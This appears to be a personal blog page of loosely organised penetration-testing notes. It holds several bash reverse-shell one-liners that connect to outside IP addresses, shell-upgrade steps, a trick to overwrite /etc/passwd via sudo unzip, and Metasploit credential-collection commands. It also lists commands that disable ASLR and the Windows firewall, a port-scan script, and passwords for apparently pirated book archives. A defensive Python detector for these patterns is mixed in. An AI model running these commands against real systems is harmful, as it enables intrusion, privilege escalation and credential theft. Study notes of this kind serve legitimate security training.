Wednesday, December 23, 2020

JUNK NOTE

 xterm-256color

https://drive.google.com/drive/folders/1wvvVQRapOn9860_ETKz9RQDEXh1hVUtx?usp=sharing


bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
tty
Ctrl + Z
echo $TERM
stty -a
stty raw -echo
fg
nc -nlvp 1234
(here you spawn the nc listener again with nc -lvnp 445)

reset
xterm

export SHELL=bash
export TERM=xterm-256color
stty rows 37 columns 146
bash -i

export TERM=linux
-->
zip passwd.zip passwd
sudo -u root unzip -o passwd.zip -d /etc/passwd
--

openssl passwd geek

$nc 192.168.1.6 56563 


OSWE's syllabus: https://www.offensive-security.com/do... Repository of s0j0hn: https://github.com/s0j0hn/AWAE-OSWE-Prep wetw0rk: https://github.com/wetw0rk/AWAE-PREP Links: https://www.linkedin.com/in/syedumara... https://twitter.com/syed__umar https://github.com/Anon-Exploiter Site/Side project: https://umar0x01.sh https://pentestlabs.gitbook.io

 

 

###Tools### windows-privesc-check https://github.com/pentestmonkey/wind... Windows Exploit Suggester https://github.com/AonCyberLabs/Windo... MSF Exploit Suggester post/multi/recon/local_exploit_suggestor BeRoot https://github.com/AlessandroZ/BeRoot JAWS ( Just Another Windows Enum Script) https://github.com/411Hall/JAWS 

 

objdump -M intel -D start | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-7 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\\x/g' | paste -d '' -s
 

 

 

-----Disable ASLR---------
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
-----Disable stack protector-------
gcc -fno-stack-protector -z execstack



File Password: linuxia.ir
All Book Password: @Hide01


File Password For 2020 Version: hide01.ir

File Password For 2019 Version: @sanspentest

Password For Open Books In Archives: @Hide01
darkOp: dsoftw
File Password: @Hide01-@OffSecPack
All Book Password: @Hide01
------------------
Password: dl.linuxia.ir
actux
------------------------------
File Password: @sanspentest All Book Password: @Hide01
 
 
#!/bin/bash
# Bash-only TCP connect scan using /dev/tcp (no nc or nmap needed).
host=10.5.5.11   # target host
for port in {1..65535}; do
  # a 0.1 s timeout keeps closed/filtered ports from stalling the loop
  timeout .1 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null &&
    echo "port $port is open"
done
echo "Done"

 
 
---------------------
hashcat error
sudo rm -rf ~/.hashcat/sessions/hashcat.pid
 


VBoxManage modifyvm "macos" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1




db_connect -y /usr/share/metasploit-framework/config/database.yml



download.phishing-server.com/dl/lucy-latest/virtualbox.zip
download.phishing-server.com/dl/lucy-latest/esxi.ova
download.phishing-server.com/dl/lucy-latest/vmware.zip
download.phishing-server.com/dl/lucy-latest/install.sh
 
macof -i wlan0 -n 15

-----Disable the firewall-----------
netsh firewall set opmode disable
-----------------------------------------------------
 
 
metasploit post exploitation phase
====================
run post/windows/gather/credentials/credential_collector
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/multi/recon/local_exploit_suggester
run post/windows/gather/usb_history
run event_manager -i
run event_manager -c
----------------------------------------------------
win Packet Scan for Enumeration of Access Control List
------------------------------------------------------
nmap -sW -O -PI -PT <URL or IP>
nmap -sV -Pn -T4 -vv 192.168.1.1
----------------------------------------
Super Network Tunnel
HTTPTunnel
HTTPORT
HTTHOST

Tuesday, December 22, 2020


Perl

Simple Shells to Fully Interactive TTYs

1. Python to spawn a PTY

2. Put the shell in to background with Ctrl-Z

3. Examine the current terminal and STTY info and match it

The information needed is the TERM type (“xterm-256color”) and the size of the current TTY (“rows 37; columns 146”)

4. Set the current STTY to raw mode and turn off local echo (stty raw -echo), so keystrokes are passed straight through to the remote shell

5. Foreground the shell with fg and re-open the shell with reset

6. Set the stty size (rows and columns) to match our current window

7. Set PATH, TERM and SHELL if missing

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export TERM=xterm
$ export SHELL=bash
$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
$ export PS1='[\u@\h \W]\$ '
python -c 'import pty; pty.spawn("/bin/sh")'
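The reverse-shell one-liners and TTY-upgrade commands collected above are also what a defender wants to spot in process-execution logs. The following detector is an added example, not part of the original notes: it runs a few signatures (the /dev/tcp redirect, pty.spawn, the __import__('os').system trick, an interactive shell flag) over constructed sample log lines; the log format and the 192.0.2.10 address are assumptions.

```python
import re
from typing import List, Tuple

# Constructed sample process-execution log lines (assumed format, not from the page).
# 192.0.2.10 is a documentation address used as a stand-in.
SAMPLE_LOGS = [
    'host=web01 uid=33 comm=bash cmd="bash -c bash -i >& /dev/tcp/192.0.2.10/1234 0>&1"',
    'host=web01 uid=33 comm=python cmd="python -c import pty; pty.spawn(\\"/bin/bash\\")"',
    'host=web01 uid=33 comm=bash cmd="stty raw -echo"',
    'host=web01 uid=1000 comm=python cmd="python -c __import__(\'os\').system(\\"bash -i\\")"',
    'host=web01 uid=1000 comm=bash cmd="ls -la /var/www"',
    'host=web01 uid=1000 comm=nc cmd="nc 192.0.2.10 56563"',
]

# Each signature maps a name to a regex over the command line.
PATTERNS = [
    # bash /dev/tcp/<ip>/<port> redirect used by the reverse-shell one-liner
    ("bash_dev_tcp_redirect", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}")),
    # python pty.spawn() used to upgrade a dumb shell to a PTY
    ("python_pty_spawn", re.compile(r"\bpty\.spawn\(")),
    # __import__('os').system(...) shell spawn from a python one-liner
    ("python_os_system_shell", re.compile(r"__import__\(['\"]os['\"]\)\.system\(")),
    # explicit interactive shell flag (bash -i / sh -i)
    ("interactive_shell_flag", re.compile(r"\b(?:bash|sh)\s+-i\b")),
]


def classify(line: str) -> List[str]:
    """Return the names of all signatures that match one log line."""
    return [name for name, rx in PATTERNS if rx.search(line)]


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, matched signature names) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = classify(line)
        if names:
            hits.append((n, names))
    return hits


if __name__ == "__main__":
    for n, names in scan(SAMPLE_LOGS):
        print(f"line {n}: {', '.join(names)}")
```

A plain outbound nc connection (last sample line) is deliberately not flagged on its own, since it is too ambiguous; correlate it with the other hits instead.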
 

 

shell cheetsheet

 __import__('os').system("bash -i")

 https://www.vinhnguyen.blog/2020/03/reverse-shell-cheatsheet-oscp.html

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 

Change permanent DNS in linux

sudo apt update

 sudo apt install resolvconf 

(confirm resolvconf is running)

 sudo systemctl status resolvconf.service 

(if resolvconf isn't running, enable then start it)

sudo systemctl enable resolvconf.service

 sudo systemctl start resolvconf.service 

(check resolvconf status)

sudo systemctl status resolvconf.service 

(edit the head file) 

sudo nano /etc/resolvconf/resolv.conf.d/head 

(enter your nameservers below the comments)

 nameserver 8.8.8.8 

nameserver 8.8.4.4 

(update the resolv.conf file)

sudo resolvconf --enable-updates

 sudo resolvconf -u 

(check if the changes were successful)

sudo nano /etc/resolv.conf 

Tuesday, December 15, 2020

Trick

Change the header of a PNG image

printf '\x89\x50\x4E\x47' | dd of=spoil.png bs=4 conv=notrunc

https://wadcoms.github.io/ 

Enumeration Scanning Notes

 nmap -vv -sV -sC -oN nmap.log <IP>
nmap -vv --script vuln -oN nmap-vln.log <IP>

----------------------For Spawning Shell------------------

bash -c 'bash -i >& /dev/tcp/10.9.36.195/8880 0>&1'